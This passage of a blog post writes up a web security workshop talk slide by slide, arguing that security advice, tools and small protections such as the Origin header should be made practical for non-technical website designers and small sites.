And second, the design of a page actually affects the security of a page. For example, if you put an advertisement on a page with a form, you've just given that advertiser or advertising server access to your user's data. Programming under the hood can't fix that; it's done on the client side. A lot of “small” sites will use a variety of cut-and-paste code that they found elsewhere, increasing their risks even though they may not realize it.

w2sp: Slide 19: So... Now What?

So... that's not terribly good. What can we do about it?

w2sp: Slide 20: Security costs may outweigh risks

Before we propose any solutions, we need to keep in mind that the cost/benefit ratio for smaller sites may be very different from what we expect. Users will reject security advice if it's more costly to implement than their risks are. And for non-technical site creators, the cost of learning security may be months of additional time, personnel, and money spent on training. Whereas how much risk is there of your community sports team website getting compromised? It may not be clear, and it may not be easy to translate into dollars.

w2sp: Slide 21: Provide more secure infrastructure and tools

So the first thing we can do is provide a more secure environment. The same origin policy already provides some basic protection to websites, and it's something designers just accept as part of the web infrastructure.

When I put together these slides, I didn't have any other ideas of what to do, but I've now seen a presentation that suggested some security restrictions that would have minimal impact on the top 100,000 websites but could improve security. (The paper is titled “On the Incoherencies in Web Browser Access Control Policies”)

It'd be really handy if graphical tools like Dreamweaver could generate secure mashups. I even talked to some students from the University of Virginia who are working on small policy additions to Ruby on Rails that could provide security – we need more work like this!

w2sp: Slide 22: Provide education (that non-programmers can understand!)

Education is also a big deal: people won't bother with better security if they don't understand the risks, and they won't fix problems correctly if they don't understand the solutions. But we have to be really careful to provide materials that make sense to the target audience of designers, and that are sufficiently short that they don't cause the costs of learning to exceed the risks.

You know how the EFF has done a great job distilling the complex privacy issues in Facebook and explaining them to the general public? We need materials like that for web security as well as privacy.

w2sp: Slide 23: Provide minimal interventions (web site first aid)

Another way we can help is by providing something akin to website first aid. If you fall and skin your knee, you know enough to wash out the wound, maybe put a bandage on it. You don't need to be a doctor to help your daughter if she trips in the playground. But right now you need to be a website surgeon to handle any security!

There's already some neat things out there: The Origin: header provides protections against XSRF with minimal effort. I worked on a system called SOMA which provided additional controls over includes in websites. But the risk is in letting these minimal interventions get too huge to be useful for average websites. I'm not a huge fan of Mozilla CSP because it's getting just too big for a quick fix. We need to put a lot of thought into optimizing policy and other solutions use for common cases and less into flexibility for unlikely edge issues.

w2sp: Slide 24: Provide Separation Between Security and Design

And of course, it'd make our lives a lot easier if we could provide more separation between security and design so that design choices wouldn't necessarily compromise your security.

w2sp: Slide 25: Offload security to others

If we had more separation between security and design of web pages, we could offload security to others. For example, the person in an organization who may care most about security are your systems administrators, because they're the ones who get woken at 4am if something goes wrong, and they're the ones who have to clean up the mess.

We may even want to consider offloading security to the users: they're the ones whose data is most at risk, and they're willing to install virus scanners and even NoScript to try to protect themselves: surely we could do better there.

And finally, there's always the option of hiring outside security experts. The costs currently are prohibitive for smaller sites, but if basic security were easier, maybe we could make this more reasonable.

One thing I've been working on is a visual system for defining security policy, so it can be integrated with design tools and so security can be articulated in a language designers already understand. I'd be happy to talk more about it if you're curious.

In conclusion, while we're doing some good work in web security, we're really limiting our impact if we don't reach out to the broader range of folk who create web pages. Making web security all sound complex, time consuming and hard at all levels may be great for our job security, but it isn't the best way to go about actually making the web safer for the world!

w2sp: Slide 26: Wrap-up and Questions

Edit: Although I was unaware of this when I wrote the paper whose title is used in this blog post, apparently "No Website Left Behind" is trademarked by Cenzic.